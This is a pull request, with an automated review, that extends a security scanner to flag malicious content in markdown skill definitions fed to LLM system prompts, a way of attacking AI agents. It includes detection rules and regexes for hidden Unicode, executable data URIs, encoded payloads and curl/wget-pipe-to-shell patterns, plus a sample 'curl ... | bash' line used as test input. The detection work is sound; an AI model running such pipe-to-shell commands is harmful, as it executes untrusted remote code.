#10705: security: extend skill scanner to detect threats in markdown skill definitions

by Alex-Alaniz open 2026-02-06 21:37

stale

Cluster: Security Enhancements for Zip Handling

## Summary

Extends the skill scanner to detect security threats in markdown files (`.md`), closing a gap where malicious content in `SKILL.md` skill definitions could bypass code-only scanning.

**Motivation:** The ClawHavoc advisory revealed 341+ malicious ClawHub skills. While VirusTotal scans code files for known malware signatures, skill metadata lives in markdown (`SKILL.md`), which was previously unscanned. Attackers can embed download-and-execute patterns, obfuscated payloads, hidden Unicode (Trojan Source / CVE-2021-42574), and executable data URIs in skill documentation that gets injected into LLM system prompts.

**Changes:**

- Split `SCANNABLE_EXTENSIONS` into `CODE_EXTENSIONS` and `MARKDOWN_EXTENSIONS` to enable file-type-specific rule routing
- Added `isMarkdown()` helper and routed `scanSource()` to use markdown-specific rules for `.md` files
- **New markdown line rules:** `hidden-unicode` (zero-width + bidi override characters), `markdown-data-uri` (executable MIME types)
- **New markdown source rules:** `markdown-download-exec` (`curl|bash` patterns), `markdown-encoded-payload` (large base64 in code blocks), `markdown-hex-payload` (hex-encoded sequences)
- Existing code rules (`eval`, `child_process`, etc.) are isolated from markdown files to prevent false positives on documentation examples

**Rule isolation:** Code-specific rules only fire on code files; markdown-specific rules only fire on `.md` files. This extends coverage without changing existing scanner behavior.
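For reviewers, the routing and the `hidden-unicode` line rule described in the summary can be pictured roughly as follows. This is a minimal sketch, not the code in this PR: the names `CODE_EXTENSIONS`, `MARKDOWN_EXTENSIONS`, `isMarkdown()`, and `scanSource()` come from the description, while the extension list, the `Finding` and `LineRule` shapes, the `extensionOf()` helper, and the regex bodies are assumptions made for illustration.

```typescript
// Hypothetical sketch: identifiers mirror the PR description, bodies are assumed.
const CODE_EXTENSIONS = new Set([".js", ".ts", ".mjs", ".cjs"]); // assumed list
const MARKDOWN_EXTENSIONS = new Set([".md"]);

type Finding = { ruleId: string; line: number; evidence: string };
type LineRule = { ruleId: string; pattern: RegExp };

// Zero-width characters (U+200B..U+200D, U+2060, U+FEFF) plus bidi
// embedding/override/isolate controls (U+202A..U+202E, U+2066..U+2069).
const HIDDEN_UNICODE = /[\u200B-\u200D\u2060\uFEFF\u202A-\u202E\u2066-\u2069]/;

const MARKDOWN_LINE_RULES: LineRule[] = [
  { ruleId: "hidden-unicode", pattern: HIDDEN_UNICODE },
];

// Illustrative stand-in for the existing code rules.
const CODE_LINE_RULES: LineRule[] = [
  { ruleId: "eval", pattern: /\beval\s*\(/ },
];

// Lower-cased extension of the final path segment, or "" if there is none.
function extensionOf(filePath: string): string {
  const lastSep = Math.max(filePath.lastIndexOf("/"), filePath.lastIndexOf("\\"));
  const base = filePath.slice(lastSep + 1);
  const dot = base.lastIndexOf(".");
  return dot <= 0 ? "" : base.slice(dot).toLowerCase();
}

function isMarkdown(filePath: string): boolean {
  return MARKDOWN_EXTENSIONS.has(extensionOf(filePath));
}

// Route each file to exactly one rule set so code rules never fire on
// markdown and markdown rules never fire on code.
function scanSource(source: string, filePath: string): Finding[] {
  let rules: LineRule[];
  if (isMarkdown(filePath)) {
    rules = MARKDOWN_LINE_RULES;
  } else if (CODE_EXTENSIONS.has(extensionOf(filePath))) {
    rules = CODE_LINE_RULES;
  } else {
    return []; // not a scannable file type
  }

  const findings: Finding[] = [];
  source.split(/\r?\n/).forEach((text, index) => {
    for (const rule of rules) {
      // Patterns carry no g/y flag, so test() keeps no state between lines.
      if (rule.pattern.test(text)) {
        findings.push({
          ruleId: rule.ruleId,
          line: index + 1,
          evidence: text.trim().slice(0, 120),
        });
      }
    }
  });
  return findings;
}
```

In this sketch, an `eval(` example inside `SKILL.md` produces no finding, while a zero-width space on the same page does. One trade-off worth noting: U+200D also appears in legitimate emoji sequences, so a rule this broad may need an allowlist.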
## Test plan

- [x] All 39 tests pass (13 original + 26 new)
- [x] New tests cover: zero-width Unicode, RTL overrides, data URIs, curl|bash, wget|sh, large base64 blocks, hex payloads
- [x] Rule isolation verified: code rules don't fire on `.md`, markdown rules don't fire on `.ts`
- [x] Clean `SKILL.md` produces zero findings
- [x] Directory scanning and summary counting work with mixed file types
- [x] `oxlint` passes with 0 warnings/errors
- [x] `tsgo` type checking passes

```bash
pnpm vitest run src/security/skill-scanner.test.ts
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

<h2>Greptile Overview</h2>

<h3>Greptile Summary</h3>

- Extends the skill scanner to treat `.md` as scannable and routes markdown files through a new set of markdown-specific rules.
- Adds markdown line rules to detect hidden Unicode/BiDi characters and executable `data:` URIs.
- Adds markdown source rules to flag download-and-execute patterns, large base64 blocks in fenced code, and hex-encoded payload strings.
- Updates tests to cover new markdown findings, directory scanning of `SKILL.md`, summary counting, and rule isolation between code vs markdown.

<h3>Confidence Score: 3/5</h3>

- This PR is likely safe to merge, but a couple of detection rules are brittle and can cause missed detections or noisy false positives.
- Core change (routing `.md` to markdown-specific rules and expanding scannable extensions) is straightforward and well-tested. Main concerns are (1) regex statefulness in `scanSource` if any rule regex acquires `g/y` flags, and (2) markdown base64 and download/exec heuristics being either overly broad (false positives) or too narrow (missed common patterns), which undermines scanner correctness.
- src/security/skill-scanner.ts
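The regex statefulness concern can be reproduced in isolation. The sketch below is illustrative only: the `downloadExec` pattern, the sample lines, and the helper names `countNaive`, `testStateless`, and `countSafe` are hypothetical and not taken from `src/security/skill-scanner.ts`. It relies on standard JavaScript behavior: `RegExp.prototype.test()` on a regex with the `g` or `y` flag resumes from `lastIndex`, so reusing one regex object across lines can skip matches.

```typescript
// Illustrative rule regex that has (accidentally) been given the `g` flag.
const downloadExec = /\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b/g;

const lines = [
  "curl https://example.invalid/install.sh | bash",
  "curl https://example.invalid/install.sh | bash",
];

// Naive use: after the first hit, lastIndex points at the end of the match,
// so the search on the next line starts there and fails.
function countNaive(pattern: RegExp, input: string[]): number {
  return input.filter((line) => pattern.test(line)).length;
}

// Guard: reset lastIndex before every test so each line is scanned from
// the start, whatever flags the rule author chose.
function testStateless(pattern: RegExp, text: string): boolean {
  pattern.lastIndex = 0;
  return pattern.test(text);
}

function countSafe(pattern: RegExp, input: string[]): number {
  return input.filter((line) => testStateless(pattern, line)).length;
}

console.log(countNaive(downloadExec, lines)); // 1: the second line is missed
console.log(countSafe(downloadExec, lines)); // 2
```

Resetting `lastIndex` keeps each rule's own flags intact. Rejecting `g`/`y` flags when rules are registered would be an alternative, at the cost of constraining rule authors.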